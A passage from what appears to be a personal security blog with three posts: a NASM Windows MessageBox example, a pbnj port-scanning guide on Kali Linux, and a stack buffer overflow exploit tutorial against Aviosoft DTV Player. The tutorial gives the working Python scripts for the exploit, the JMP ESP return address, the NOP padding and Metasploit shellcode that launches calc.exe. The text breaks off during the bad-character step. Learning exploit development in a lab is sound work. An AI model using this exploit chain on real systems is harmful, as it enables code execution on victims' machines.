(N)ASM windows MessageBox , import dll

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Mostly i use NASM, GCC, LD for programming practices! Because I use Linux as my primary Operating system, So i love to use cross-platform application.

I am not an asm coder, in past i have searched a lots for ASM(nasm) code of MessagBox() function Example just to get started. Because everything was fairly new to me(i had no clue!). So i just decided to post a simple example code which was my first assembly program for windows, in case someone is searching for basic example for getting started. I hope it will be useful to someone who is in same situation as i was!

First Example:

extern _ExitProcess@4
extern _MessageBoxA@16

global _main

section .data
msgb db "pusheax.com!",0
title db "Security Research!",0
section .text

_main:

push dword 0x00
;mov esi,msgb
;push esi
push dword title
push dword msgb
push dword 0
call _MessageBoxA@16

push 0
call _ExitProcess@4

“extern” is importing symbol from other module. In our case the symbols are _ExitProcess@4 and _MessageBoxA@16. There are three things we see are:

1. underscore before MessageBoxA .
2. @4/16 

The underscore used for calling the function in C style, Linux does not have underscore(_). And @4/16 indicating that how many parameter for the calling function. Such as MessageBox has 4 parameters. Each parameters are 4 bytes so 4 parameters are (4*4) 16bytes=4 . Extra “A” for ANSI-C .

“global _main” , declaring it as startup of our asm instructions(C style).

“Section .data” , you know what is it! Declaring uninitialized data such as variable.

in “section .text” (our codes) there are all parameters pushed to stack in reverse mode. I have called MessageBox(see here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx ). The MessageBox in C should be like this:

MessageBox(NULL,msgb,title,0x00000000L)

in ASM it is opposite:

First pushing the 0x00000000L(MB_OK) to stack. Currently top of the stack!
Then pushing “title” . “title” is now top of the stack.
Then pushing “msgb”. Same as above. “msgb(string)” top of the stack .
And last push is 0 . Same as above.
At last call the function.

Stack is LIFO(Last in first out). So it is now:

MessageBox(NULL,msgb,title,0x00000000L)

 It is always always good idea terminating the current process so ExitProccess() function has been called when MessageBox() operation is completed.

Compile the code :
nasm -fwin32 msg.asm
gcc msg.obj -o msg.exe

But I want to import specific dll because all dlls are not loaded so some API function may not work if i can’t load the dll in my code. How i do this ? “import MessageBoxA@16 user32.dll” ? I think this is not going to happen for me because nasm will not generate win32 object file(Perhaps issue). So i need to work with obj (nasm -fobj msg.asm) but another issue is gcc won’t compile the obj file.. I used ALINK (Download: http://alink.sourceforge.net/), This what we want instead using gcc/LD (maybe)? But still LD can be used to compile it by linking library with (-l) . Here is the code i have assembled with nasm and compiled with alink.exe:

import MessageBoxA user32.dll ;Include the dll user32.dll
extern MessageBoxA ; Now calling external symbol without underscore....

section .data
msgme db "Hi",0 ;Say "Hi" to pusheax.com

section .text use32 CLASS=CODE ;"use32 CLASS=CODE for telling the other linker(Such as alink.exe) that program for 32bit

..start: ; ..start (not _start) for other linker for start of the code

push dword 0x00 ; MB_OK
mov esi,msgme ;esi="Hi"
push esi ;"Hi" is now top of the stack, second paramaters title
push dword msgme ; Say "Hi"
push dword 0 ;Reserve
call [MessageBoxA] ;Call the Function

;nasm -fobj msg2.asm
;alink -oPE msg2.obj

 If we use ld(with gcc) then our command should be ld -o what.exe what.obj -luser32.dll whereas alink.exe -oPE what.exe but nasm. For alink we don’t need to declare how many parameters , underscore etc and for ld we need to declare all the required things and extra option “-l” to link dll.  

Which Linker you will use?

Port scanning using pbnj!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Recently i installed Kali Linux on Vmware workstation. There was a tool called pbnj which can scan port and store results in mysql database. Sometime it is useful storing vulnerable assessment into database.But in Kali linux it is not installed as default. pbnj use nmap(with “-a [options] to scan network , I only use it store the result in database!

Let’s  see how to install and use it to scan port and store to database

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj

Start mysql services on Kali Linux:

root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..


Let’s find all file related of pbnj :

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums



I am going to use mysql so i am only interested in “/usr/share/doc/pbnj/examples/mysql.yaml” . So we need to edit this file to use correct username, password and database :
root@find:~# cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml;
nano ~/.pbnj-2.0/nano config.yaml
# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd:""
# Password for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306

In Kali mysql password is blank and username “root”. You should really change the username and password. But i am doing it without changing anything. Set let’s configure mysql:
root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>

We are ready to go now:

root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
Can pass hostnames, IP addresses, networks, etc.
Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
-i --iplist <iplist> Scan using a list of IPs from a file
-x --xml <xml-file> Parse scan/info from Nmap XML file

Scan Options:
-a --args <args> Execute Nmap with args (needs quotes)
-e --extraargs <args> Add args to the default args (needs quotes)
--inter <interface> Perform Nmap Scan using non default interface
-m --moreports <ports> Add ports to scan ex: 8080 or 3306,5900
-n --nmap <path> Path to Nmap executable
-p --pingscan Ping Target then scan the host(s) that are alive
--udp Add UDP to the scan arguments
--rpc Add RPC to the scan arguments
-r --range <ports> Ports for scan [def 1-1025]

--diffbanner Parse changes of the banner

Config Options:
-d --dbconfig <config> Config for results database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]
--dir <dir> Directory for SQLite or CSV file [def . ]

General Options:
--nocolors Don't Print Colors
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Now Let’s scan port:

root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for 127.0.0.1
--------------------------------------


Above the command option “-a” for nmap argument is “-sS”. Scan finished and hopefully result written to database. Let’s check:

root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
-> ;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines |
| services |
+------------------+
2 rows in set (0.00 sec)

mysql> select * from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid | service | state | port | protocol | version | banner | machine_updated | updated_on |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| 12 | mysql | up | 3306 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
| 12 | postgresql | up | 5432 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows in set (0.00 sec)

mysql>

mysql> select * from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip | host | localh | os | machine_created | created_on |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| 1 | 192.168.2.92 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 2 | 192.168.2.96 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 3 | 192.168.2.91 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 4 | 192.168.2.98 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 5 | 192.168.2.99 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 6 | 192.168.2.100 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 7 | 192.168.2.97 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 8 | 192.168.2.94 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 9 | 192.168.2.93 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 10 | 192.168.2.90 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 11 | 192.168.2.95 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 12 | 127.0.0.1 | localhost | 1 | unknown os | 1364339543 | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows in set (0.00 sec)

mysql>

There is another tool installed called outputpbnj which can be used to dump the result without manually logging to MySQL.

root@find:~# locate outputpbnj
/usr/bin/outputpbnj
/usr/share/man/man1/outputpbnj.1p.gz

root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options]
Query Options:
-q --query <name> Perform sql query
-t --type <type> Output Type [csv,tab,html]
-f --file <filename> Store the result in file otherwise stdout
--both Print results and store them in a file
--dir <dir> Store the result in this directory [def .]

-l --lookup <name> Lookup descrition based on name
--list List of names and descriptions
-n --name Lookup all the names
-d --desc Lookup all the descriptions
-s --sql Lookup all the sql queries

Config Options:
--qconfig <file> Config of sql queries [def query.yaml]
--dbconfig <file> Config for accessing database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]

General Options:
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )


Okay, Let’s dump the latest result:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"

wtf!

It is not working for as expected, No problem i am going to edit the “outputpbnj”(perl script). I have to remove “|” from “test” and “debug”. Kali linux use LeafPad text editor so “leafpad /usr/bin/outputpbnj” or you can use gedit or kate/kwrite(KDE) . Then searching for “test|=s”:

GetOptions(
%options,
'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
'query|q=s', 'names|n', 'desc|d', 'sql|s', 'list',
'dbconfig=s', 'configdir=s', 'dir=s', 'data=s', 'qconfig=s',
'test|=s', 'debug|=s',
'help|h' => sub { help(); },
'version|v' => sub { print_version(); },
'both' => sub { $bothOutput = 1 },
)
or exit 1;

Just remove the pipe “|” from “test” and “debug”, It should be :‘test=s’,    ‘debug=s’  Now save and run :

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013 localhost mysql up unknown versiontcp
Tue Mar 26 19:12:23 2013 localhost postgresql up unknown version tcp


It is possible save the output in different format. For example:

root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr#

Another curiosity that i can use only one query(“-q”) or there are more…. no, I can use many command:

possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit 

All the query command is available in outputpbnj script(With Description)!

These kind of tool really useful for vulnerability assessment. pbnj is really a nice tool.

Exploit writing – Stack based Buffer overflow

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

There are many exploit writing tutorials. But the corelan’s exploit writing tutorials are much much better. If you want to learn exploit development , of course you may get started with corelan too. Anyway,

Today i have tried to exploit an application , found at http://www.exploit-db.com/exploits/22932/ (The exploit script did not work for me). Exploiting the vulnerability was very easy but specifically finding the bad char was bit tricky. At least I was able to find all bad char using Corelan’s mona.py and exploited the application successfully.  The following tools i used to develop the exploit:

1. Vmware workstation .

2. Python.

3. Immunity Debbugger .

4. Mona.py. (Copy mona.py to “C:Program FilesImmunity IncImmunity DebuggerPyCommands”)

5. Windows XP3 and windows 7.

6. Metasploit.

If you are going to try/build this exploit yourself then you also need those above tools, So make sure to download them as your preparation.

i have downloaded the vulnerable application first and installed on windows xp3 vm.

                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="A" * 2000

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

It will create a file “crash-me.PLF” . If i open the file in AviSoft DTV Player then it just crashes. Well, Let’s Attach with Immunity Debugger to see what is happening.

Click on Debbug>>Run .

Now let’s open the “crash-me.PLF” :

So its finally crashed and i saw esp and eip register contains “AAAAAAAA….” :

It clearly indicating that i control EIP which is mean the crash is really exploitable(Explaining later!).   Now it is time to find how many the stack requiring for getting overwritten EIP. So time to work with a great tool mona.py .  There was old odd way to do that but now we can do it using metasploit or mona.py very easily. We already know the application crashed since we sent 2000Bytes junk. So we will create a Cycling Patter using mona.

First i set default working folder for mona:

mona config -set workingfolder c:mona%p

Then Mona command is : 

!mona pattern_create 2000

 It just created a file in C:monaAviosoftDTV called “pattern.txt” . This time need to edit the script again and put the Cycling patter instead “A”.  the full script will be look like this:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Replacing “A”*2000 with following pattern generated by mona

Now need to regenerate the “crash-me.PLF” file and open with AviSoft DTV(Already attached with debugger) . So the application crashed again but  with mona’s Cycling pattern instead “AAAAAA…” . So i need to take note of EIP value. In my case it is “37694136” :

This time we need to figure out the exact bytes to overwrite EIP . For this mona is enough :

!mona pattern_offset 37694136

 It tells that we need 260 bytes to overwrite stack and more 4 bytes we will need to overwrite EIP. So it is 260+4=264 bytes

Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="BBBB" #more 4 bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"

In the script i have replaced Cycling patter with 260 bytes “A” and more 4 bytes to overwrite EIP with “BBBB” then 1736 bytes (2000-264). If first junk(260 bytes) length is okay then EIP will be “BBBB”. Let’s try:

See EIP is 42424242=BBBB and ESP(Stack Pointer) is contains CCCC.. But here i see another problem that after EIP  some “CCCC”:

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC


We really need to jump over these nasty junk. See later on. Anyway, We see we are controlling EIP. Because there are  “BBBB”.

Our Next goal will be:

1. Replacing “BBBB” with valid pointer(Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

                                                                   FIND EIP
Let’s find EIP address. EIP address can be found in application or OS dll. For reliability we should always try to use Application’s dll if possible. So In this application i am going to find the EIP from application’s dll. Again i will use use mona(mona is very powerful and i know what i am doing.) . So the command should be:

!mona jmp -r esp -o


It will create a file called “jmp.txt” in “C:monaAviosoftDTV” and there will be following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)

Here i will use 0x6411a7ab. Before that for learning purpose let’s find this address manually using Immunity Debugger itself(First we need to trigger the crashed otherwise all dll won’t load properly):

1. Immunity Debugger menu : View>> View Executable Modules .
2. Find the “NetReg.dll” and double click on it:

3. Our goal is finding “JMP ESP” . 
4. Right click on the window and Search For>> All Commands>>

5. Now another window will pop up and search for “jmp esp”

I was keeping searching until found the 0x6411a7ab.

                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let’s get back to real work. We need to modify the script put the address in EIP variable instead “BBBB”. We should remember that windows is little endian , means we need reverse the address so EIP should be “0x6411a7ab=xabxa7x11x64. Here is the modified script:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="C"*1500 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"
Let’s run the application through Debugger and it should now have the exact address i have set. Time to make the application execute the shellcode. So i am modifying the script again to make it more safe:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py, "A" Replaced with nops
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #More nops before reach to shellcode
shellcode="D"*1000 #Will replace with shellcode.
try:
f.write(push+eip+junk+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
What i did on above script is just replaced all “A” with nops. Nops mean do nothing but pass to next instruction(Not a good idea?). Recently i mentioned that after EIP we see some unnecessary “CCCCCC…”  which will completely break our exploit. Putting enough nops will solve this problem too. Before going to next step let’s test it if it is working as i expected.

1. Setting breakpoint at EIP address 0x6411a7ab to make sure that our exploit is reaching to right address. To do that we need to following :

Right click>>Go to >>Expression

2. When new window will pop up , search the eip address,  You may need to search it twice. If found the address then we will see like this:

3. Now press F2. It may warn you about breakpointing to this address but you can ignore the warning. Well, Now i am going to open it(Attached with debugger). It hits the breakpoint and i can see now i am landing to nops directly:

So it worked!

Let’s put real shellcode instead “D”. It is time to use metasploit to generate windows/exec shellcode to execute calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "x00x0a" -t c

I tried to avoid the normal bad char “x00x0a”. And Metasploit  generated following shellcode:

 

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c"

Anyway, Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode
shellcode=("xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

Well, ReGenerate the “crash-me.PLF” file and opening with the attached avisoft dtv but unfortunately it just crashed….

It does not even land to nops(wtf!). Seems it is happening for bad char, some code has been truncated. But no problem we can find the bad char using mona and this was my new knowledge today learning to use mona to find bad char easily. bad chars can corrupt, truncate our shellcode. If there is any bad chars then our exploits won’t work!

So instead spending much time i am going to use mona to find the bad chars(This will be good idea).I am using the first crash PoC again. Let’s see how i did it.

                                                    

                                                      FINDING BAD CHARS
First command:

!mona bytearray -b "x00"

“x00” is common bad char so i used it to generate all bytecode using mona.

Mona created two file in C:monaAviosoftDTV , 1. bytearray.txt 2. bytearray.bin . bytearray.bin is binary which will need later for comparing.

Well, in bytearray.txt are following contents :

Modify the script and put the generated output to the script right after  variable push=”A”*2000 :

print "Creating expoit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000 #Found by mona.py
push+=("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
